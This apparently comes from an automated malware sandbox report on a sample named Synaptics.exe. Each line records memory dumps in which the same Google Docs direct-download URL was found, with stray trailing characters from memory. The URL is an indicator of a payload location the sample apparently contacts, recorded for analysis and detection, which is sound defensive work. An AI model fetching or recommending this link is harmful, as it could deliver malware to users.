                                Source: Synaptics.exe, 00000003.00000002.1680158652.0000000005463000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1685726810.0000000007FFA000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1685726810.0000000008102000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.1371121105.000000000546D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadF
                                Source: Synaptics.exe, 00000003.00000002.1703794957.000000000F0E6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadFSs
                                Source: Synaptics.exe, 00000003.00000003.1328907159.000000000546F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1680158652.000000000547E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1680158652.0000000005463000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1702581967.000000000F043000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1685726810.0000000008102000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.1371121105.000000000546D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1680158652.00000000053ED000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1685726810.000000000805A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadG
                                Source: Synaptics.exe, 00000003.00000002.1680158652.000000000547E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1685726810.000000000809F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1685726810.0000000007F7D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1685726810.0000000008102000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1685726810.000000000805A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadH
                                Source: Synaptics.exe, 00000003.00000002.1677147245.00000000006D4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.1372365134.00000000006F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadHj
                                Source: Synaptics.exe, 00000003.00000002.1704585165.000000000F1A5000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1685726810.0000000007FFA000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1680158652.00000000053ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadI
                                Source: Synaptics.exe, 00000003.00000002.1702581967.000000000F043000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadIMy
                                Source: Synaptics.exe, 00000003.00000002.1677147245.0000000000688000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadINx
                                Source: Synaptics.exe, 00000003.00000002.1702581967.000000000F043000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadIO
                                Source: Synaptics.exe, 00000003.00000002.1703794957.000000000F0E6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadIPj
                                Source: Synaptics.exe, 00000003.00000002.1680158652.00000000053ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadIQ2
                                Source: Synaptics.exe, 00000003.00000002.1677147245.00000000006D4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.1372365134.00000000006F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadIZ
                                Source: Synaptics.exe, 00000003.00000002.1702581967.000000000F043000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadIm
                                Source: Synaptics.exe, 00000003.00000002.1677147245.0000000000688000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1680158652.000000000547E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1678256875.00000000021B0000.00000004.00001000.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1685726810.0000000008102000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1685726810.000000000805A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadJ
                                Source: Synaptics.exe, 00000003.00000002.1703794957.000000000F0E6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadJOg
                                Source: Synaptics.exe, 00000003.00000002.1680158652.0000000005463000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.1371121105.000000000546D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadJ_
                                Source: Synaptics.exe, 00000003.00000002.1685726810.0000000007FFA000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1685726810.0000000008102000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadK
                                Source: Synaptics.exe, 00000003.00000002.1703794957.000000000F0E6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadKSh
                                Source: Synaptics.exe, 00000003.00000003.1371121105.00000000054CB000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1685726810.0000000007FFA000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1685726810.000000000809F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1685726810.0000000008102000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1680158652.00000000053ED000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1680158652.00000000054C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadL
                                Source: Synaptics.exe, 00000003.00000002.1703794957.000000000F0E6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadLQm
                                Source: Synaptics.exe, 00000003.00000002.1677147245.000000000070C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.1372365134.0000000000709000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1701019081.000000000EF82000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadM
                                Source: Synaptics.exe, 00000003.00000002.1677147245.00000000006BE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadM$
                                Source: Synaptics.exe, 00000003.00000002.1680158652.0000000005463000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1677147245.000000000070C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.1372365134.0000000000709000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.1371121105.000000000546D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1701019081.000000000EF82000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadN
                                Source: Synaptics.exe, 00000003.00000002.1703794957.000000000F0E6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadN1
                                Source: Synaptics.exe, 00000003.00000002.1680158652.000000000547E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1685726810.0000000008102000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1701019081.000000000EF82000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1685726810.000000000805A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadO
                                Source: Synaptics.exe, 00000003.00000002.1677147245.00000000006D4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.1372365134.00000000006F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadOA
                                Source: Synaptics.exe, 00000003.00000002.1703794957.000000000F0E6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadOMl
                                Source: Synaptics.exe, 00000003.00000002.1677147245.00000000006D4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadOu
                                Source: Synaptics.exe, 00000003.00000002.1685726810.000000000809F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1685726810.0000000008102000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadP
                                Source: Synaptics.exe, 00000003.00000002.1677147245.000000000070C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.1372365134.0000000000709000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadPIv
                                Source: Synaptics.exe, 00000003.00000002.1703794957.000000000F0E6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadPTA
                                Source: Synaptics.exe, 00000003.00000002.1701019081.000000000EF82000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadPerm
                                Source: Synaptics.exe, 00000003.00000002.1677147245.0000000000688000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1680158652.000000000547E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1704585165.000000000F1A5000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1685726810.0000000008102000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1701019081.000000000EF82000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1685726810.000000000805A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadQ
                                Source: Synaptics.exe, 00000003.00000002.1703794957.000000000F0E6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadQMB
                                Source: Synaptics.exe, 00000003.00000002.1677147245.00000000006D4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadQu
                                Source: Synaptics.exe, 00000003.00000002.1677147245.0000000000688000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1680158652.000000000547E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1680158652.0000000005463000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1677147245.000000000070C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1685726810.0000000008102000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.1372365134.0000000000709000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.1371121105.000000000546D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1685726810.000000000805A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadR
                                Source: Synaptics.exe, 00000003.00000002.1677147245.000000000070C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.1372365134.0000000000709000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadROW
                                Source: Synaptics.exe, 00000003.00000002.1685726810.0000000007FFA000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1685726810.0000000008102000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1680158652.00000000053ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadS
                                Source: Synaptics.exe, 00000003.00000002.1677147245.00000000006D4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.1372365134.00000000006F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadSA
                                Source: Synaptics.exe, 00000003.00000002.1703794957.000000000F0E6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadSP
                                Source: Synaptics.exe, 00000003.00000002.1680158652.00000000054C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadSS
                                Source: Synaptics.exe, 00000003.00000002.1701019081.000000000EF82000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadSec-CU
                                Source: Synaptics.exe, 00000003.00000002.1677147245.0000000000688000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1680158652.000000000547E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1677147245.000000000070C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1685726810.000000000809F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1685726810.0000000007F7D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1685726810.0000000008102000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.1372365134.0000000000709000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1685726810.000000000805A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadT
                                Source: Synaptics.exe, 00000003.00000002.1703794957.000000000F0E6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadTNE
                                Source: Synaptics.exe, 00000003.00000002.1685726810.0000000007FFA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadTh
                                Source: Synaptics.exe, 00000003.00000002.1677147245.00000000006D4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadTv
                                Source: Synaptics.exe, 00000003.00000002.1685726810.0000000008102000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1701019081.000000000EF82000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadU
                                Source: Synaptics.exe, 00000003.00000003.1371121105.00000000054CB000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1680158652.00000000054C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadU(c
                                Source: Synaptics.exe, 00000003.00000002.1701019081.000000000EF82000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadUniv
                                Source: Synaptics.exe, 00000003.00000002.1680158652.0000000005463000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1685726810.0000000007FFA000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1677147245.000000000070C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1702581967.000000000F043000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1685726810.0000000008102000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.1372365134.0000000000709000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.1371121105.000000000546D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1680158652.00000000053ED000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1680158652.00000000054C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadV
                                Source: Synaptics.exe, 00000003.00000002.1685726810.0000000007F48000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadVk&export=download
                                Source: Synaptics.exe, 00000003.00000002.1680158652.0000000005463000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1685726810.0000000007FFA000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1685726810.0000000007F7D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1685726810.0000000008102000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.1371121105.000000000546D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1680158652.00000000053ED000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1703794957.000000000F0E6000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1685726810.000000000805A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadW
                                Source: Synaptics.exe, 00000003.00000002.1685726810.0000000007FFA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadW#
                                Source: Synaptics.exe, 00000003.00000002.1685726810.0000000007FFA000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1677147245.000000000070C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1685726810.0000000007F7D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.1372365134.0000000000709000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadX
                                Source: Synaptics.exe, 00000003.00000002.1677147245.00000000006BE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadX$/
                                Source: Synaptics.exe, 00000003.00000002.1680158652.000000000547E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1685726810.0000000008102000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadY
                                Source: Synaptics.exe, 00000003.00000002.1703794957.000000000F0E6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadYNz
                                Source: Synaptics.exe, 00000003.00000002.1677147245.00000000006D4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadYv
                                Source: Synaptics.exe, 00000003.00000002.1680158652.000000000547E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1685726810.0000000008102000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1701019081.000000000EF82000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1685726810.000000000805A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadZ
                                Source: Synaptics.exe, 00000003.00000002.1701019081.000000000EF82000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download_
                                Source: Synaptics.exe, 00000003.00000002.1677147245.00000000006BE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download_%
                                Source: Synaptics.exe, 00000003.00000002.1677147245.00000000006D4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.1372365134.00000000006F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download_B
                                Source: Synaptics.exe, 00000003.00000002.1704585165.000000000F1A5000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1685726810.0000000007FFA000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1685726810.0000000008102000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1680158652.00000000054C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloada
                                Source: Synaptics.exe, 00000003.00000002.1680158652.00000000053ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadaR
                                Source: Synaptics.exe, 00000003.00000002.1685726810.0000000008102000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadad
                                Source: Synaptics.exe, 00000003.00000002.1680158652.00000000054C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadadmo
                                Source: Synaptics.exe, 00000003.00000002.1685726810.0000000007FFA000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1685726810.0000000008102000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadb
                                Source: Synaptics.exe, 00000003.00000003.1371121105.00000000054CB000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1680158652.00000000054C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadb(
                                Source: Synaptics.exe, 00000003.00000002.1703794957.000000000F0E6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadbR
                                Source: Synaptics.exe, 00000003.00000002.1701019081.000000000EF82000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadc
                                Source: Synaptics.exe, 00000003.00000002.1685726810.0000000007FFA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadc.
                                Source: Synaptics.exe, 00000003.00000002.1677147245.00000000006D4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.1372365134.00000000006F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadcC
                                Source: Synaptics.exe, 00000003.00000002.1702581967.000000000F043000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadce
                                Source: Synaptics.exe, 00000003.00000002.1680158652.00000000054C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadcha.%&s
                                Source: Synaptics.exe, 00000003.00000002.1685726810.0000000008102000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadcn
                                Source: Synaptics.exe, 00000003.00000002.1680158652.00000000054C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadcn.co
                                Source: Synaptics.exe, 00000003.00000002.1685726810.0000000008102000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadcn.com
                                Source: Synaptics.exe, 00000003.00000002.1685726810.0000000007FFA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadco
                                Source: Synaptics.exe, 00000003.00000002.1677147245.00000000006D4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1677147245.000000000070C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1702581967.000000000F043000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1685726810.000000000809F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1685726810.0000000007F7D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.1372365134.0000000000709000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.1372365134.00000000006F3000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1703794957.000000000F0E6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadd
                                Source: Synaptics.exe, 00000003.00000002.1703794957.000000000F0E6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloaddT
                                Source: Synaptics.exe, 00000003.00000003.1372365134.0000000000709000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloaddate
                                Source: Synaptics.exe, 00000003.00000002.1685726810.0000000008102000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1680158652.00000000054C1000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1701019081.000000000EF82000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1685726810.000000000805A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloade
